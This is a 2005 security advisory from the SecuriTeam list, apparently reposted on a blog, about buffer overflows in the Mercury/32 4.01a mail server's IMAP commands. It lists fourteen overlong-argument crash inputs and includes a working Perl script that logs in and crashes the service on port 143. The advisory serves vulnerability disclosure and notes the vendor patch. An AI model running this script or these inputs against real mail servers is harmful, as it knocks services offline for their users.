Tuesday, September 13, 2005

[NEWS] Mercury Mail Multiple Buffer Overflows

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Mercury Mail Multiple Buffer Overflows
------------------------------------------------------------------------

SUMMARY

<http://www.pmail.com/> Mercury is "a free, standards-based mail server
solution, providing comprehensive, fast server support for all major
Internet e-mail protocols. It is supplied in two versions, one hosted on
Windows systems, the other running as a set of NLMs on Novell NetWare file
servers".

An authenticated user can trigger several buffer overflows and possibly
run arbitrary code on the Mercury Mail server.

DETAILS

Vulnerable Systems:
* Mercury/32 version 4.01a

Immune Systems:
* Mercury/32 version 4.01b and later

There are 14 vulnerable commands that can be used to cause buffer
overflows to occur. After a successful login to the mail server, if any of
these commands are used with an overly long argument the application
closes resulting in a denial of service.

The commands and approximate argument lengths are as follows:
EXAMINE A x 512 \r\n
SUBSCRIBE A x 512 \r\n
STATUS A x 512 \r\n
APPEND A x 512 \r\n
CHECK A x 512 \r\n
CLOSE A x 512 \r\n
EXPUNGE A x 512 \r\n
FETCH A x 512 \r\n
RENAME A x 768 \r\n
DELETE A x 768 \r\n
LIST A x 768 \r\n
SEARCH A x 768 \r\n
CREATE A x 1024 \r\n
UNSUBSCRIBE A x 1024 \r\n

Vendor Status:
The vendor was notified an patch was released to solve the issues. For
more details visit the patches page at:
<http://www.pmail.com/patches.htm> http://www.pmail.com/patches.htm

Exploit Code:
#===== Start Mercury32_Overflow.pl =====
#
# Usage: Mercury32_Overflow.pl <ip> <imap4 user> <imap4 pass>
# Mercury32_Overflow.pl 127.0.0.1 hello moto
#
# Mercury/32, v4.01a, Dec 8 2003
#
# Download:
# http://www.pmail.com/
#
###########################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "143",
Proto => "TCP"))
{
print "Attempting to kill Mercury/32 service at $ARGV[0]:143...";

sleep(1);

print $socket "0000 LOGIN $ARGV[1] $ARGV[2]\r\n";

sleep(1);

print $socket "0001 CHECK " . "A" x 512 . "\r\n";

close($socket);

sleep(1);

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "143",
Proto => "TCP"))
{
close($socket);

print "failed!\n";
}
else
{
print "successful!\n";
}
}
else
{
print "Cannot connect to $ARGV[0]:143\n";
}
#===== End Mercury32_Overflow.pl =====

ADDITIONAL INFORMATION

The information has been provided by <mailto:reedarvin@gmail.com> Reed
Arvin.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

at

No comments:

Post a Comment